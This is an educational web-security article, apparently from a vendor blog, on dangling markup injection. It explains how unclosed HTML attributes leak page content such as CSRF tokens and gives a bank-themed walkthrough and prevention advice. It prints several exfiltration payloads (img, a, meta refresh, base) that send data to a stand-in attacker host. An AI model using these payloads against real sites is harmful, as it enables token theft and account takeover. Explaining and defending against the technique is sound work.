What is Dangling Markup Injection? Ways to Exploit, Examples and Impact

Web security often focuses on high-profile vulnerabilities like Cross-Site Scripting (XSS) or SQL Injection, but there is a subtler, often overlooked vulnerability known as Dangling Markup Injection. This technique allows an attacker to exfiltrate sensitive data from a webpage without ever executing a single line of JavaScript. By exploiting how browsers parse HTML tags that are left "dangling" or unclosed, attackers can capture CSRF tokens, personal information, and session details that would otherwise be protected by modern security headers.

Understanding the Mechanics of Dangling Markup

Dangling Markup Injection is a type of "information disclosure" vulnerability. It occurs when an application improperly filters user input and allows an attacker to inject a partial HTML tag. The term "dangling" refers to the fact that the injected tag is left open, missing its closing quote or closing bracket.

When a web browser encounters an unclosed attribute, such as <img src=', it doesn't immediately stop. Instead, it continues to parse the rest of the HTML document, treating everything it finds as part of that attribute's value until it encounters the next matching quote. This behavior is a byproduct of the browser's attempt to be "helpful" and fix malformed HTML on the fly. For an attacker, this is a golden opportunity to "swallow" the rest of the page and send it to an external server.

The Core Mechanism: An Example

Imagine a web application that greets a user by their name, which is reflected from a URL parameter, and then displays a sensitive CSRF token later in the source code:

<html>
  <body>
    <h1>Hello, [USER_INPUT]!</h1>
    <form action="/update-email" method="POST">
      <input type="hidden" name="csrf_token" value="s3cr3t_t0k3n_123">
      <input type="text" name="email">
      <input type="submit" value="Update">
    </form>
  </body>
</html>

If the application fails to sanitize [USER_INPUT], an attacker can provide a payload like <img src='https://attacker.com/log?data=.

The resulting HTML rendered by the browser would look like this:

<html>
  <body>
    <h1>Hello, <img src='https://attacker.com/log?data=!</h1>
    <form action="/update-email" method="POST">
      <input type="hidden" name="csrf_token" value="s3cr3t_t0k3n_123">
      ...

Wait, where did the closing quote go? Because the attacker didn't provide one, the browser looks for the next single quote (') in the document to close the src attribute. In this case, the next single quote is found at the end of the action attribute in the form or within the CSRF token input if it uses single quotes. The browser then makes a GET request to attacker.com containing all the HTML text in between as part of the URL query string. The attacker's server logs will show a request like:

GET /log?data=!</h1><form%20action="/update-email"%20method="POST"><input%20type="hidden"%20name="csrf_token"%20value="s3cr3t_t0k3n_123">

The attacker now has the user's CSRF token.

Dangling Markup vs. Cross-Site Scripting (XSS)

It is important to distinguish Dangling Markup Injection from its more famous cousin, XSS. While both involve injecting malicious content into a webpage, their goals and execution differ significantly.

1. Execution vs. Exfiltration: XSS aims to execute malicious scripts in the victim's browser. Dangling Markup aims to exfiltrate existing data from the DOM by leveraging browser parsing logic.
2. Bypassing CSP: Many modern websites use a Content Security Policy (CSP) that blocks inline scripts and untrusted external scripts (e.g., script-src 'self'). However, a CSP might still allow images to be loaded from external sources (img-src *). In such cases, XSS is blocked, but Dangling Markup Injection via an <img> tag remains viable.
3. Payload Complexity: XSS payloads often require bypassing complex filters for keywords like alert, eval, or <script>. Dangling markup often only requires a simple tag like <img> or <a> and an open quote.

Common Exploitation Vectors and Payloads

Attackers have several tools in their arsenal for dangling markup, depending on what the target application allows and how the HTML is structured.

1. The Image Tag (<img>)

As seen in the previous example, the <img> tag is the most common vector. It is frequently allowed by security policies and is processed immediately by the browser as it tries to render the page.

Payload: <img src='https://attacker.com/log?

2. The Anchor Tag (<a>)

If an attacker can inject an anchor tag, they can wrap a large portion of the page in a link. While this requires user interaction (the user must click somewhere on the page), it can be used to exfiltrate data when the user clicks what they think is a legitimate part of the UI.

Payload: <a href='https://attacker.com/log?

3. The Meta Refresh Tag (<meta>)

The <meta> tag can be used to redirect the user or refresh the page. If injected into the <head>, it can be used to send the remainder of the head's content to an attacker's server.

Payload: <meta http-equiv="refresh" content="0; url=https://attacker.com/log?

4. The Base Tag (<base>)

The <base> tag specifies the base URL for all relative URLs in a document. By injecting a dangling <base href='https://attacker.com/ tag, an attacker can hijack every relative link and form submission on the page, redirecting them to their own server.

Real-World Scenario: Stealing CSRF Tokens

Let's look at a more technical breakdown of how an attacker might steal a CSRF token from a banking application. Suppose the application has a search feature that reflects the search term:

https://bank.com/search?q=mysearch

The page source includes:

<div class="search-results">
  You searched for: mysearch
</div>
<div class="user-actions">
  <form action="/transfer" method="POST">
    <input type="hidden" name="token" value="9988776655">
    ...
  </form>
</div>

The attacker sends a link to the victim:
https://bank.com/search?q=<img src='https://attacker.com/exfil?

When the victim clicks the link, the browser renders:

<div class="search-results">
  You searched for: <img src='https://attacker.com/exfil? 
</div>
<div class="user-actions">
  <form action="/transfer" method="POST">
    <input type="hidden" name="token" value="9988776655">

The browser sees the single quote after value= and uses it to close the src attribute of the image. The browser then attempts to load:
https://attacker.com/exfil? </div><div class="user-actions"><form action="/transfer" method="POST"><input type="hidden" name="token" value="9988776655

The attacker checks their web server logs, extracts the token value, and can now perform unauthorized transfers on behalf of the user.

The Impact of Dangling Markup Injection

The impact of this vulnerability is often underestimated. Because it doesn't involve "hacking" in the traditional sense of running code, developers sometimes categorize it as a low-risk UI bug. However, the consequences can be severe:

• Account Takeover: By stealing CSRF tokens, attackers can change account passwords, update recovery emails, or authorize fraudulent transactions.
• Data Exfiltration: On pages displaying PII (Personally Identifiable Information), such as profile settings or medical records, dangling markup can leak names, addresses, and private data to third-party logs.
• Bypassing Security Controls: It serves as a powerful workaround for environments with strict Content Security Policies that would otherwise mitigate XSS.
• Loss of Trust: Users who find their data leaked via simple HTML injection lose confidence in the platform's security posture.

How to Prevent Dangling Markup Injection

Preventing dangling markup requires a combination of secure coding practices and modern browser security features. Since the vulnerability relies on the browser "swallowing" subsequent HTML, the fix involves ensuring that user-controlled data cannot break out of its intended context.

1. Proper Output Encoding

The most effective defense is to always encode user-controlled data before rendering it in HTML. Converting characters like <, >, ', and " into their HTML entity equivalents (<, >, ', ") ensures the browser treats them as literal text rather than the start of a new tag or attribute.

2. Use a Strict Content Security Policy (CSP)

A well-configured CSP can significantly limit the damage of a dangling markup attack. Specifically, the img-src, connect-src, and default-src directives should be used to restrict where the browser can send data.

Example of a restrictive policy:
Content-Security-Policy: default-src 'self'; img-src 'self' https://trusted-cdn.com;

With this policy, the browser would refuse to load the attacker's <img> tag because attacker.com is not in the allowlist.

3. Browser-Level Mitigations

Modern browsers have introduced mitigations to combat dangling markup. For example, Chromium-based browsers now block internal resources from being loaded if the URL contains certain characters like newlines or raw control characters, which are often caught in dangling markup exfiltration. However, these mitigations are not exhaustive and should not be relied upon as the primary line of defense.

4. Strategic Placement of Sensitive Data

Whenever possible, avoid placing sensitive tokens or PII in the HTML source immediately following a reflected input. By placing sensitive data above the reflected input in the DOM, you make it much harder for a "downward-seeking" dangling markup tag to capture it.

5. Use SameSite Cookie Attributes

Since many dangling markup attacks aim to facilitate CSRF, setting your session cookies to SameSite=Strict or SameSite=Lax provides an additional layer of protection by ensuring cookies aren't sent with cross-site requests initiated by the injected markup.

Conclusion

Dangling Markup Injection is a reminder that web security is not just about blocking scripts; it is about understanding the fundamental ways browsers interpret the languages of the web. While it may seem less dramatic than a full-scale remote code execution, its ability to silently exfiltrate sensitive data makes it a critical threat to address in any modern web application. By implementing rigorous output encoding and maintaining a strong Content Security Policy, developers can close the door on these "dangling" threats.

To proactively monitor your organization's external attack surface and catch exposures before attackers do, try Jsmon.